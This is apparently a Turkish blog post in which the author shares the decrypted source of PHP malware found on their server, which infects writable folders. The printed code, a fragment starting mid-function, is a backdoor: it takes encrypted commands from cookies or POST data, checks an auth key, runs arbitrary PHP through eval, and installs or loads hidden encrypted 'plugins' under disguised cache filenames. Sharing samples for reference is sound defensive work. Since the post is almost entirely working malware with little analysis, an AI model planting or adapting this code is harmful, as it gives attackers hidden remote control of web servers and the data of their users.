Yazılabilir klasörlere bulaşan virüs

Arkadaşlarınızla Paylaşın!

Sunucudan ayıkladığım şifreli virüsün açık halini kaynak olması açısından paylaşıyorum

[code]
$plugin_name)
{
if (strpos($plugin_name, substr(md5(“cache”), 0, 5)) !== False)
{
@eval(cs_decrypt(cs_file_read($storage_path . “/” . $plugin_name), cs_GetHost()));
}
}
}
else
{
$storage_path = $storage_path . “/” . substr(md5(“cache”), 0, 5) . “_” . md5($name . cs_GetHost());

if (file_exists($storage_path))
{
@eval(cs_decrypt(cs_file_read($storage_path), cs_GetHost()));
}
}
}
}

function cs_writable_check()
{
if (strlen(cs_GetCommonStorage()) != 0)
{
return True;
}
else
{
return False;
}
}

foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}

if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}

$data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

if (isset($data[‘ak’]) && $cs_auth==$data[‘ak’])
{
if ($data[‘a’] == ‘i’)
{
$i = Array(
‘pv’ => @phpversion(),
‘sv’ => ‘1.0-2’,
‘ak’ => $data[‘ak’],
);
echo @serialize($i);
exit;
}
elseif ($data[‘a’] == ‘e’)
{
eval($data[‘d’]);
}
elseif ($data[‘a’] == ‘plugin’)
{
if($data[‘sa’] == ‘add’)
{
cs_plugin_add($data[‘p’], $data[‘d’]);
}
elseif($data[‘sa’] == ‘rem’)
{
cs_plugin_rem($data[‘p’]);
}
}
echo $data[‘ak’];
exit();
}

cs_plugin_load();
}
[/code]

Yazar: Teknoloji24

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir